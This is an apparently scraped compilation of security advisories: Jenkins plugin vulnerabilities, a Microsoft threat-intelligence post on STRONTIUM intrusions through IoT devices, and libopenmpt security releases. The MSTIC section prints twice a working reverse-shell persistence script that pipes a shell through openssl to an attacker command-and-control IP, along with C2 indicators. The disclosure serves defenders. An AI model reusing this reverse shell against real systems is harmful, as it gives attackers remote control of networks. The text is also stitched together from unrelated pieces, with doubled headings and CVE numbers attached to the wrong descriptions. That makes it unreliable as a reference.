An open redirect vulnerability in Jenkins Gitlab Authentication Plugin 1.4 and earlier in GitLabSecurityRealm.java allows attackers to redirect users to a URL outside Jenkins after successful login.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Avatar Plugin
*   Build Pipeline Plugin
*   Codefresh Integration Plugin
*   Configuration as Code Plugin
*   eggplant-plugin Plugin
*   File System SCM Plugin
*   Google Cloud Messaging Notification Plugin
*   GitLab Authentication Plugin
*   JClouds Plugin
*   Mask Passwords Plugin
*   PegDown Formatter Plugin
*   Relution Enterprise Appstore Publisher Plugin
*   Simple Travis Pipeline Runner Plugin
*   TestLink Plugin
*   VMware Lab Manager Slaves Plugin
*   Wall Display Master Project Plugin
*   XL TestView Plugin

**Descriptions****Configuration as Code Plugin failed to mask secrets in system log messages**

**SECURITY-1497 / CVE-2019-10367**  
**Severity (CVSS):** Medium  
**Affected plugin: configuration-as-code**  
**Description:**

Configuration as Code Plugin logs the changes it applies to the Jenkins system log. Secrets such as passwords should be masked (i.e. replaced with asterisks) in that log to prevent accidental disclosure. Configuration as Code Plugin inspects the type and looks for a field, getter, or constructor argument corresponding to the property, making the secret detection much more robust for the purpose of log message masking. This was implemented in the fix for SECURITY-1279 in the 2019-07-31 security advisory.

That fix was incomplete and did not cover a log message written to the logger io.jenkins.plugins.casc.impl.configurators.DataBoundConfigurator.

Configuration as Code Plugin now uses the same secret detection for these log messages.

As a workaround, administrators can configure the logging level of the logger io.jenkins.plugins.casc.impl.configurators.DataBoundConfigurator to a level that does not include these messages. Configuration as Code Plugin 1.25 and earlier logs these messages at the INFO level, Configuration as Code Plugin 1.26 logs them at FINE. See the logging documentation for details.

**CSRF vulnerability and missing permission check in JClouds Plugin allowed capturing credentials**

**SECURITY-1482 / CVE-2019-10368 (CSRF), CVE-2019-10369 (permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: jclouds-jenkins**  
**Description:**

JClouds Plugin did not perform permission checks on a method implementing form validation. This allowed users with Overall/Read access to Jenkins to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Additionally, this form validation method did not require POST requests, resulting in a cross-site request forgery vulnerability.

This form validation method now requires POST requests and Overall/Administer permission.

**Mask Passwords Plugin shows plain text passwords in global configuration form fields**

**SECURITY-157 / CVE-2019-10370**  
**Severity (CVSS):** Low  
**Affected plugin: mask-passwords**  
**Description:**

Mask Passwords Plugin allows specifying passwords to be provided to builds in the global Jenkins configuration.

While the passwords are stored encrypted on disk, they are transmitted in plain text as part of the configuration form. This can result in exposure of the password through browser extensions, cross-site scripting vulnerabilities, and similar situations.

As of publication of this advisory, there is no fix.

**HTTP session fixation vulnerability in GitLab Authentication Plugin**

**SECURITY-795 / CVE-2019-10371**  
**Severity (CVSS):** Medium  
**Affected plugin: gitlab-oauth**  
**Description:**

GitLab Authentication Plugin does not invalidate the previous session and create a new one upon successful login. This allows attackers able to control or obtain another user’s pre-login session ID to impersonate them.

As of publication of this advisory, there is no fix.

**Open redirect vulnerability in GitLab Authentication Plugin**

**SECURITY-796 / CVE-2019-10372**  
**Severity (CVSS):** Medium  
**Affected plugin: gitlab-oauth**  
**Description:**

GitLab Authentication Plugin records the HTTP Referer header when the authentication process starts and redirects users to that URL when the user has finished logging in.

This implements an open redirect, allowing malicious sites to implement a phishing attack, with users expecting they have just logged in to Jenkins.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerability in Build Pipeline Plugin**

**SECURITY-879 / CVE-2019-10373**  
**Severity (CVSS):** Medium  
**Affected plugin: build-pipeline-plugin**  
**Description:**

Build Pipeline Plugin does not properly escape variables in views, resulting in a stored cross-site scripting vulnerability exploitable by users with permission to configure build pipelines.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerability in PegDown Formatter Plugin**

**SECURITY-142 / CVE-2019-10374**  
**Severity (CVSS):** Medium  
**Affected plugin: pegdown-formatter**  
**Description:**

PegDown Formatter Plugin uses the PegDown library to implement support for rendering Markdown formatted descriptions in Jenkins. It advertises disabling of HTML to prevent cross-site scripting (XSS) as a feature.

PegDown Formatter Plugin does not prevent the use of javascript: scheme in URLs for links. This results in an XSS vulnerability exploitable by users able to configure entities with descriptions or similar properties that are rendered by the configured markup formatter.

As of publication of this advisory, there is no fix.

**Arbitrary file read vulnerability in File System SCM Plugin**

**SECURITY-569 / CVE-2019-10375**  
**Severity (CVSS):** Medium  
**Affected plugin: filesystem_scm**  
**Description:**

File System SCM Plugin allows users able to configure jobs to read arbitrary files from the Jenkins controller, even if the job is running on an agent.

As of publication of this advisory, there is no fix.

**Reflected XSS vulnerability in Wall Display Master Project Plugin**

**SECURITY-751 / CVE-2019-10376**  
**Severity (CVSS):** Medium  
**Affected plugin: jenkinswalldisplay**  
**Description:**

Wall Display Master Project Plugin does not properly escape the customTheme query parameter, resulting in a reflected cross-site scripting vulnerability.

As of publication of this advisory, there is no fix.

**Avatar Plugin allows changing other users' avatars**

**SECURITY-1099 / CVE-2019-10377**  
**Severity (CVSS):** Medium  
**Affected plugin: avatar**  
**Description:**

Avatar Plugin does not implement a permission check for the HTTP URL used to replace user avatars. This allows any user with Overall/Read permission to change any other user’s avatar, in addition to their own.

As of publication of this advisory, there is no fix.

**TestLink Plugin stores credentials in plain text**

**SECURITY-1428 / CVE-2019-10378**  
**Severity (CVSS):** Low  
**Affected plugin: testlink**  
**Description:**

TestLink Plugin stores credentials unencrypted in its global configuration file hudson.plugins.testlink.TestLinkBuilder.xml on the Jenkins controller. These credentials can be viewed by users with access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Google Cloud Messaging Notification Plugin stores credentials in plain text**

**SECURITY-591 / CVE-2019-10379**  
**Severity (CVSS):** Low  
**Affected plugin: gcm-notification**  
**Description:**

Google Cloud Messaging Notification Plugin stores an API key unencrypted in its global configuration file org.jenkinsci.plugins.gcm.im.GcmPublisher.xml on the Jenkins controller. These credentials can be viewed by users with access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Script sandbox bypass vulnerability in Simple Travis Pipeline Runner Plugin**

**SECURITY-922 / CVE-2019-10380**  
**Severity (CVSS):** High  
**Affected plugin: simple-travis-runner**  
**Description:**

Simple Travis Pipeline Runner Plugin defines a custom list of pre-approved signatures for scripts protected by the Script Security sandbox.

This custom list of pre-approved signatures allows the use of methods that can be used to bypass Script Security sandbox protection. This results in arbitrary code execution on any Jenkins instance with this plugin installed.

As of publication of this advisory, there is no fix.

**Codefresh Integration Plugin globally and unconditionally disables SSL/TLS certificate validation**

**SECURITY-931 / CVE-2019-10381**  
**Severity (CVSS):** Medium  
**Affected plugin: codefresh**  
**Description:**

Codefresh Integration Plugin unconditionally disables SSL/TLS certificate validation for the entire Jenkins controller JVM.

As of publication of this advisory, there is no fix.

**VMware Lab Manager Slaves Plugin globally and unconditionally disables SSL/TLS certificate validation**

**SECURITY-1376 / CVE-2019-10382**  
**Severity (CVSS):** Medium  
**Affected plugin: labmanager**  
**Description:**

VMware Lab Manager Slaves Plugin unconditionally disables SSL/TLS certificate validation for the entire Jenkins controller JVM.

As of publication of this advisory, there is no fix.

**eggplant-plugin Plugin stores credentials in plain text**

**SECURITY-1430 / CVE-2019-10385**  
**Severity (CVSS):** Medium  
**Affected plugin: eggplant-plugin**  
**Description:**

eggplant-plugin Plugin stores credentials unencrypted in job config.xml files on the Jenkins controller. These credentials can be viewed by users with Extended Read permission, or access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**CSRF vulnerability and missing permission check in XL TestView Plugin allow capturing credentials**

**SECURITY-1008 / CVE-2019-10386 (CSRF), CVE-2019-10387 (permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: xltestview-plugin**  
**Description:**

XL TestView Plugin does not perform permission checks on a method implementing form validation. This allows users with Overall/Read access to Jenkins to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery vulnerability.

As of publication of this advisory, there is no fix.

**CSRF vulnerability and missing permission check in Relution Enterprise Appstore Publisher Plugin allow SSRF**

**SECURITY-1053 / CVE-2019-10388 (CSRF), CVE-2019-10389 (permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: relution-publisher**  
**Description:**

A missing permission check in a form validation method in Relution Enterprise Appstore Publisher Plugin allows users with Overall/Read permission to initiate a connection test to an attacker-specified URL using attacker-specified credentials and attacker-specified HTTP proxy configuration.

Additionally, the form validation method does not require POST requests, resulting in a CSRF vulnerability.

As of publication of this advisory, there is no fix.

**Severity**

*   SECURITY-142: Medium
*   SECURITY-157: Low
*   SECURITY-569: Medium
*   SECURITY-591: Low
*   SECURITY-751: Medium
*   SECURITY-795: Medium
*   SECURITY-796: Medium
*   SECURITY-879: Medium
*   SECURITY-922: High
*   SECURITY-931: Medium
*   SECURITY-1008: Medium
*   SECURITY-1053: Medium
*   SECURITY-1099: Medium
*   SECURITY-1376: Medium
*   SECURITY-1428: Low
*   SECURITY-1430: Medium
*   SECURITY-1482: Medium
*   SECURITY-1497: Medium

**Affected Versions**

*   **Avatar Plugin** up to and including 1.2
*   **Build Pipeline Plugin** up to and including 1.5.8
*   **Codefresh Integration Plugin** up to and including 1.8
*   **Configuration as Code Plugin** up to and including 1.26
*   **eggplant-plugin Plugin** up to and including 2.2
*   **File System SCM Plugin** up to and including 2.1
*   **Google Cloud Messaging Notification Plugin** up to and including 1.0
*   **GitLab Authentication Plugin** up to and including 1.4
*   **JClouds Plugin** up to and including 2.14
*   **Mask Passwords Plugin** up to and including 2.12.0
*   **PegDown Formatter Plugin** up to and including 1.3
*   **Relution Enterprise Appstore Publisher Plugin** up to and including 1.24
*   **Simple Travis Pipeline Runner Plugin** up to and including 1.0
*   **TestLink Plugin** up to and including 3.16
*   **VMware Lab Manager Slaves Plugin** up to and including 0.2.8
*   **Wall Display Master Project Plugin** up to and including 0.6.34
*   **XL TestView Plugin** up to and including 1.2.0

**Fix**

*   **Configuration as Code Plugin** should be updated to version 1.27
*   **JClouds Plugin** should be updated to version 2.15

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   Avatar Plugin
*   Build Pipeline Plugin
*   Codefresh Integration Plugin
*   eggplant-plugin Plugin
*   File System SCM Plugin
*   Google Cloud Messaging Notification Plugin
*   GitLab Authentication Plugin
*   Mask Passwords Plugin
*   PegDown Formatter Plugin
*   Relution Enterprise Appstore Publisher Plugin
*   Simple Travis Pipeline Runner Plugin
*   TestLink Plugin
*   VMware Lab Manager Slaves Plugin
*   Wall Display Master Project Plugin
*   XL TestView Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Daniel Beck, CloudBees, Inc.** for SECURITY-879, SECURITY-931, SECURITY-1053, SECURITY-1376
*   **David Fiser of Trend Micro Nebula working with Trend Micro's Zero Day Initiative** for SECURITY-1428, SECURITY-1430
*   **Jesse Glick, CloudBees, Inc.** for SECURITY-922
*   **MWR labs (@mwrlabs)** for SECURITY-751
*   **Matthias Schmalz, SAP SE** for SECURITY-157
*   **Oleg Nenashev, CloudBees, Inc.** for SECURITY-1008, SECURITY-1099
*   **Oleg Nenashev, CloudBees, Inc., and, independently, Viktor Gazdag NCC Group** for SECURITY-1482
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-795, SECURITY-796

CVE-2019-10372: Jenkins Security Advisory 2019-08-07

A stored cross-site scripting vulnerability in Jenkins PegDown Formatter Plugin 1.3 and earlier allows attackers able to edit descriptions and other fields rendered using the configured markup formatter to insert links with the javascript scheme into the Jenkins UI.

CVE-2019-10374: Jenkins Security Advisory 2019-08-07

A stored cross-site scripting vulnerability in Jenkins Build Pipeline Plugin 1.5.8 and earlier allows attackers able to edit the build pipeline description to inject arbitrary HTML and JavaScript in the plugin-provided web pages in Jenkins.

CVE-2019-10373: Jenkins Security Advisory 2019-08-07

Due to an incomplete fix of CVE-2019-10343, Jenkins Configuration as Code Plugin 1.26 and earlier did not properly apply masking to some values expected to be hidden when logging the configuration being applied.

CVE-2019-10367: Jenkins Security Advisory 2019-08-07

A reflected cross-site scripting vulnerability in Jenkins Wall Display Plugin 0.6.34 and earlier allows attackers to inject arbitrary HTML and JavaScript into web pages provided by this plugin.

CVE-2019-10376: Jenkins Security Advisory 2019-08-07

Jenkins VMware Lab Manager Slaves Plugin 0.2.8 and earlier disables SSL/TLS and hostname verification globally for the Jenkins master JVM.

CVE-2019-10382: Jenkins Security Advisory 2019-08-07

Jenkins Codefresh Integration Plugin 1.8 and earlier disables SSL/TLS and hostname verification globally for the Jenkins master JVM.

CVE-2019-10381: Jenkins Security Advisory 2019-08-07

In the Linux kernel before 4.16.4, a double free vulnerability in the f_midi_set_alt function of drivers/usb/gadget/function/f_midi.c in the f_midi driver may allow attackers to cause a denial of service or possibly have unspecified other impact.

CVE-2018-20961

Several sources estimate that by the year 2020 some 50 billion IoT devices will be deployed worldwide. IoT devices are purposefully designed to connect to a network and many are simply connected to the internet with little management or oversight. Such devices still must be identifiable, maintained, and monitored by security teams, especially in large complex enterprises.

Several sources estimate that by the year 2020 some 50 billion IoT devices will be deployed worldwide. IoT devices are purposefully designed to connect to a network and many are simply connected to the internet with little management or oversight. Such devices still must be identifiable, maintained, and monitored by security teams, especially in large complex enterprises. Some IoT devices may even communicate basic telemetry back to the device manufacturer or have means to receive software updates. In most cases however, the customers’ IT operation center don’t know they exist on the network.

In 2016, the Mirai botnet was discovered by the malware research group MalwareMustDie. The botnet initially consisted of IP cameras and basic home routers, two types of IoT devices commonly found in the household. As more variants of Mirai emerged, so did the list IoT devices it was targeting. The source code for the malware powering this botnet was eventually leaked online.

In 2018, hundreds of thousands of home and small business networking and storage devices were compromised and loaded with the so-called “VPN Filter” malware. The FBI has publicly attributed this activity to a nation-state actor and took subsequent actions to disrupt this botnet, although the devices would remain vulnerable to re-infection unless proper firmware or security controls were put in place by the user.

There were also multiple press reports of cyber-attacks on several devices during the opening ceremonies for the 2018 Olympic Games in PyeongChang. Officials did confirm a few days later that they were a victim of malicious cyber-attacks that prevented attendees from printing their tickets to the Games and televisions and internet access in the main press center simply stopped working.

**Three IoT devices Three IoT devices**

In April, security researchers in the Microsoft Threat Intelligence Center discovered infrastructure of a known adversary communicating to several external devices. Further research uncovered attempts by the actor to compromise popular IoT devices (a VOIP phone, an office printer, and a video decoder) across multiple customer locations. The investigation uncovered that an actor had used these devices to gain initial access to corporate networks. In two of the cases, the passwords for the devices were deployed without changing the default manufacturer’s passwords and in the third instance the latest security update had not been applied to the device.

These devices became points of ingress from which the actor established a presence on the network and continued looking for further access. Once the actor had successfully established access to the network, a simple network scan to look for other insecure devices allowed them to discover and move across the network in search of higher-privileged accounts that would grant access to higher-value data. After gaining access to each of the IoT devices, the actor ran _tcpdump_ to sniff network traffic on local subnets. They were also seen enumerating administrative groups to attempt further exploitation. As the actor moved from one device to another, they would drop a simple shell script to establish persistence on the network which allowed extended access to continue hunting. Analysis of network traffic showed the devices were also communicating with an external command and control (C2) server.

\--contents of_[IOT Device]_\` file–

**!/bin/sh !/bin/sh**

export _\[IOT Device\]_`` ="-qws -display :1 -nomouse" echo 1|tee /tmp/.c;sh -c '(until (sh -c "openssl s_client -quiet -host 167.114.153.55 -port 443 |while : ; do sh && break; done| openssl s_client -quiet -host 167.114.153.55 -port 443"); do (sleep 10 && cn=$((cat /tmp/.c\`+1)) && echo $cn|tee /tmp.c && if \[ $cn -ge 30 \]; then (rm /tmp/.c;pkill -f ‘openssl’); fi);done)&’ &

–end contents of file–\`\`

_Figure 1: script used to maintain network persistence_

The following IP addresses are believed to have been used by the actor for command and control (C2) during these intrusions:

167.114.153.55

94.237.37.28

82.118.242.171

31.220.61.251

128.199.199.187

**Attribution Attribution**

We attribute the attacks on these customers using three popular IoT devices to an activity group that Microsoft refers to as STRONTIUM. Since we identified these attacks in the early stages, we have not been able to conclusively determine what STRONTIUM’s ultimate objectives were in these intrusions.

Over the last twelve months, Microsoft has delivered nearly 1400 nation-state notifications to those who have been targeted or compromised by STRONTIUM. One in five notifications of STRONTIUM activity were tied to attacks against non-governmental organizations, think tanks, or politically affiliated organizations around the world. The remaining 80% of STRONTIUM attacks have largely targeted organizations in the following sectors: government, IT, military, defense, medicine, education, and engineering. We have also observed and notified STRONTIUM attacks against Olympic organizing committees, anti-doping agencies, and the hospitality industry. The “VPN Filter” malware has also been attributed to STRONTIUM by the FBI.

**Call to action Call to action**

Today we are sharing this information to raise awareness of these risks across the industry and calling for better enterprise integration of IoT devices, particularly the ability to monitor IoT device telemetry within enterprise networks. Today, the number of deployed IoT devices outnumber the population of personal computers and mobile phones, combined. With each networked IoT device having its own separate network stack, it’s quite easy to see the need for better enterprise management, especially in today’s “bring your own device” world.

While much of the industry focuses on the threats of hardware implants, we can see in this example that adversaries are happy to exploit simpler configuration and security issues to achieve their objectives. These simple attacks taking advantage of weak device management are likely to expand as more IoT devices are deployed in corporate environments. Upon conclusion of our investigation, we shared this information with the manufacturers of the specific devices involved and they have used this event to explore new protections in their products. However, there is a need for broader focus across IoT in general, both from security teams at organizations that need to be more aware of these types of threats, as well as from IoT device makers who need to provide better enterprise support and monitoring capabilities to make it easier for security teams to defend their networks.

**Indicators of Compromise Indicators of Compromise**

Below are a series of indicators Microsoft has observed as active during the STRONTIUM activity discussed in this article.

**Command-and-Control (C2) IP addresses Command-and-Control (C2) IP addresses**

167.114.153.55

94.237.37.28

82.118.242.171

31.220.61.251

128.199.199.187

**Script for maintaining persistence on network connected device Script for maintaining persistence on network connected device**

--contents of_[IOT Device]_\` file–

**!/bin/sh !/bin/sh**

export _\[IOT Device\]_`` ="-qws -display :1 -nomouse" echo 1|tee /tmp/.c;sh -c '(until (sh -c "openssl s_client -quiet -host 167.114.153.55 -port 443 |while : ; do sh && break; done| openssl s_client -quiet -host 167.114.153.55 -port 443"); do (sleep 10 && cn=$((cat /tmp/.c\`+1)) && echo $cn|tee /tmp.c && if \[ $cn -ge 30 \]; then (rm /tmp/.c;pkill -f ‘openssl’); fi);done)&’ &

–end contents of file–\`\`

**Recommendations for Securing Enterprise IoT Recommendations for Securing Enterprise IoT**

There are additional steps an organization can take to protect their infrastructure and network from similar activity. Microsoft recommends the following actions to better secure and manage risk associated with IoT devices:

1.  Require approval and cataloging of any IoT devices running in your corporate environment.
2.  Develop a custom security policy for each IoT device.
3.  Avoid exposing IoT devices directly to the internet or create custom access controls to limit exposure.
4.  Use a separate network for IoT devices if feasible.
5.  Conduct routine configuration/patch audits against deployed IoT devices.
6.  Define policies for isolation of IoT devices, preservation of device data, ability to maintain logs of device traffic, and capture of device images for forensic investigation.
7.  Include IoT device configuration weaknesses or IoT-based intrusion scenarios as part of Red Team testing.
8.  Monitor IoT device activity for abnormal behavior (e.g. a printer browsing SharePoint sites…).
9.  Audit any identities and credentials that have authorized access to IoT devices, users and processes.
10.  Centralize asset/configuration/patch management if feasible.
11.  If your devices are deployed/managed by a 3rd party, include explicit Terms in your contracts detailing security practices to be followed and Audits that report security status and health of all managed devices.
12.  Where possible, define SLA Terms in IoT device vendor contracts that set a mutually acceptable window for investigative response and forensic analysis to any compromise involving their product.

_This case is one of several examples that__Eric Doerr will present at Black Hat__, on August 8, 2019, where Microsoft is calling for greater industry transparency to ensure that defenders are best equipped to respond to threats from well-resourced adversaries._

_Microsoft Threat Intelligence Center (MSTIC)_

Corporate IoT - a path to intrusion

DSM in libopenmpt before 0.4.2 allows an assertion failure during file parsing with debug STLs.

The OpenMPT/libopenmpt project released the latest stable libopenmpt version:

**libopenmpt 0.4.2 (2019-01-22)**

*   \[**Sec**\] DSM: Assertion failure during file parsing with debug STLs (r11209). (CVE-2019-14382)
*   \[**Sec**\] J2B: Assertion failure during file parsing with debug STLs (r11216). (CVE-2019-14383)
    
*   S3M: Allow volume change of OPL instruments after Note Cut.

The changelog for older versions can be found at https://lib.openmpt.org/doc/changelog.html .

Source code download links:

*   https://lib.openmpt.org/files/libopenmpt/src/libopenmpt-0.4.2+release.autotools.tar.gz
*   https://lib.openmpt.org/files/libopenmpt/src/libopenmpt-0.4.2+release.makefile.tar.gz
*   https://lib.openmpt.org/files/libopenmpt/src/libopenmpt-0.4.2+release.msvc.zip

Documentation and binary downloads can be found at the libopenmpt website at https://lib.openmpt.org/libopenmpt/.

The OpenMPT/libopenmpt project also released an update to the old libopenmpt 0.3 stable branch:

**libopenmpt 0.3.15 (2019-01-22)**

*   \[**Sec**\] DSM: Assertion failure during file parsing with debug STLs (r11210). (CVE-2019-14382)
*   \[**Sec**\] J2B: Assertion failure during file parsing with debug STLs (r11217). (CVE-2019-14383)

Source code download links:

*   https://lib.openmpt.org/files/libopenmpt/src/libopenmpt-0.3.15+release.autotools.tar.gz
*   https://lib.openmpt.org/files/libopenmpt/src/libopenmpt-0.3.15+release.makefile.tar.gz
*   https://lib.openmpt.org/files/libopenmpt/src/libopenmpt-0.3.15+release.msvc.zip

Documentation and binary downloads can be found at the libopenmpt website at https://lib.openmpt.org/libopenmpt/.

The OpenMPT/libopenmpt project also released an update to the old libopenmpt 0.2 stable branch:

**libopenmpt 0.2.11253-beta37 (2019-01-22)**

*   \[**Sec**\] DSM: Assertion failure during file parsing with debug STLs (r11211). (CVE-2019-14382)
*   \[**Sec**\] J2B: Assertion failure during file parsing with debug STLs (r11218). (CVE-2019-14383)
    
*   Do not apply Amiga playback heuristics to MOD files that have clearly been written with a PC tracker.
*   SFX: Work around bad conversions of the “Operation Stealth” soundtrack by turning pattern breaks into note stops.
*   MO3: Apply playback changes based on “ModPlug-made” header flag.

Source code download links:

*   https://lib.openmpt.org/files/libopenmpt/src/libopenmpt-0.2.11253-beta37-autotools.tar.gz
*   https://lib.openmpt.org/files/libopenmpt/src/libopenmpt-0.2.11253-beta37.tar.gz
*   https://lib.openmpt.org/files/libopenmpt/src/libopenmpt-0.2.11253-beta37-windows.zip

The OpenMPT/libopenmpt project updated the following libopenmpt versions with security fixes:

**libopenmpt-0.2.7561-beta20.5-p13 (2019-01-22)**

*   r11262: \[Sec\] Assertion failure with debug STLs (J2B). (CVE-2019-14383)
*   r11261: \[Sec\] Assertion failure with debug STLs (DSM). (CVE-2019-14382)

The following individual patches fix the mentioned issues (these patches must **all** be applied sequentially **on top** of the original libopenmpt-0.2.7561-beta20.5 source release):

*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7561-beta20.5/libopenmpt-0.2.7561-beta20.5-secfix-p1-theoretical-null-pointer-dereference-during-out-of-memory-while-error-handling.patch (already announced previously)
*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7561-beta20.5/libopenmpt-0.2.7561-beta20.5-secfix-p2-excessive-cpu-consumption-on-malformed-files-ams.patch (already announced previously)
*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7561-beta20.5/libopenmpt-0.2.7561-beta20.5-secfix-p3-invalid-memory-read-when-applying-nnas-to-effect-plugins.patch (already announced previously)
*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7561-beta20.5/libopenmpt-0.2.7561-beta20.5-secfix-p4-race-condition-in-multi-threaded-use-it.patch (already announced previously)
*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7561-beta20.5/libopenmpt-0.2.7561-beta20.5-secfix-p5-out-of-bounds-read-plm.patch (already announced previously)
*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7561-beta20.5/libopenmpt-0.2.7561-beta20.5-secfix-p6-race-condition-in-multi-threaded-use-it-mod-dmf.patch (already announced previously)
*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7561-beta20.5/libopenmpt-0.2.7561-beta20.5-secfix-p7-heap-buffer-overflow-in-sample-loading-from-malformed-files-psm.patch (already announced previously)
*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7561-beta20.5/libopenmpt-0.2.7561-beta20.5-secfix-p8-out-of-bounds-read-it-itp-mo3.patch (already announced previously)
*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7561-beta20.5/libopenmpt-0.2.7561-beta20.5-secfix-p9-null-pointer-dereference-write-after-out-of-memory-ams.patch (already announced previously)
*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7561-beta20.5/libopenmpt-0.2.7561-beta20.5-secfix-p10-division-by-zero-and-integer-overflow-mptm.patch (already announced previously)
*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7561-beta20.5/libopenmpt-0.2.7561-beta20.5-secfix-p11-out-of-bounds-read-med.patch (already announced previously)
    
*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7561-beta20.5/libopenmpt-0.2.7561-beta20.5-secfix-p12-debug-stl-assertion-failure-dsm.patch
*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7561-beta20.5/libopenmpt-0.2.7561-beta20.5-secfix-p13-debug-stl-assertion-failure-j2b.patch

**libopenmpt-0.2.7386-beta20.3-p16 (2019-01-22)**

*   r11259: \[Sec\] Assertion failure with debug STLs (J2B). (CVE-2019-14383)
*   r11258: \[Sec\] Assertion failure with debug STLs (DSM). (CVE-2019-14382)

The following individual patches fix the mentioned issues (these patches must **all** be applied sequentially **on top** of the original libopenmpt-0.2.7386-beta20.3 source release):

*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7386-beta20.3/libopenmpt-0.2.7386-beta20.3-secfix-p1-division-by-zero-in-tempo-calculation.patch (already announced previously)
*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7386-beta20.3/libopenmpt-0.2.7386-beta20.3-secfix-p2-infinite-loop-in-plugin-routing.patch (already announced previously)
*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7386-beta20.3/libopenmpt-0.2.7386-beta20.3-secfix-p3-excessive-cpu-consumption-on-malformed-files-dmf-mdl.patch (already announced previously)
*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7386-beta20.3/libopenmpt-0.2.7386-beta20.3-secfix-p4-theoretical-null-pointer-dereference-during-out-of-memory-while-error-handling.patch (already announced previously)
*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7386-beta20.3/libopenmpt-0.2.7386-beta20.3-secfix-p5-excessive-cpu-consumption-on-malformed-files-ams.patch (already announced previously)
*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7386-beta20.3/libopenmpt-0.2.7386-beta20.3-secfix-p6-invalid-memory-read-when-applying-nnas-to-effect-plugins.patch (already announced previously)
*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7386-beta20.3/libopenmpt-0.2.7386-beta20.3-secfix-p7-race-condition-in-multi-threaded-use-it.patch (already announced previously)
*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7386-beta20.3/libopenmpt-0.2.7386-beta20.3-secfix-p8-out-of-bounds-read-plm.patch (already announced previously)
*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7386-beta20.3/libopenmpt-0.2.7386-beta20.3-secfix-p9-race-condition-in-multi-threaded-use-it-mod-dmf.patch (already announced previously)
*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7386-beta20.3/libopenmpt-0.2.7386-beta20.3-secfix-p10-heap-buffer-overflow-in-sample-loading-from-malformed-files-psm.patch (already announced previously)
*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7386-beta20.3/libopenmpt-0.2.7386-beta20.3-secfix-p11-out-of-bounds-read-it-itp-mo3.patch (already announced previously)
*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7386-beta20.3/libopenmpt-0.2.7386-beta20.3-secfix-p12-null-pointer-dereference-write-after-out-of-memory-ams.patch (already announced previously)
*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7386-beta20.3/libopenmpt-0.2.7386-beta20.3-secfix-p13-division-by-zero-and-integer-overflow-mptm.patch (already announced previously)
*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7386-beta20.3/libopenmpt-0.2.7386-beta20.3-secfix-p14-out-of-bounds-read-med.patch (already announced previously)
    
*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7386-beta20.3/libopenmpt-0.2.7386-beta20.3-secfix-p15-debug-stl-assertion-failure-dsm.patch
*   https://lib.openmpt.org/files/libopenmpt/secfix/libopenmpt-0.2.7386-beta20.3/libopenmpt-0.2.7386-beta20.3-secfix-p16-debug-stl-assertion-failure-j2b.patch

The following libopenmpt versions are currently supported with security fixes by the OpenMPT/libopenmpt project:

*   0.4.2
    *   Current stable version.
    *   Receives security updates.
    *   Receives minor playback fixes.
*   0.3.15
    *   Old stable version.
    *   Receives security updates.
    *   Receives trivial bug fixes.
*   0.2.11253-beta37
    *   Old stable version.
    *   Receives security updates.
    *   Receives trivial bug fixes.
*   0.2.7561-beta20.5-p13
    *   Older stable version which is supported on Unix-like systems only.
    *   Receives only security fixes.
*   0.2.7386-beta20.3-p16
    *   Older stable version which is supported on Unix-like systems only.
    *   Receives only security fixes.
*   0.5 (SVN trunk)
    *   development
    *   security updates
    *   playback fixes
    *   new features
    *   new file formats

Please update to the newest versions.

Tag

#ssl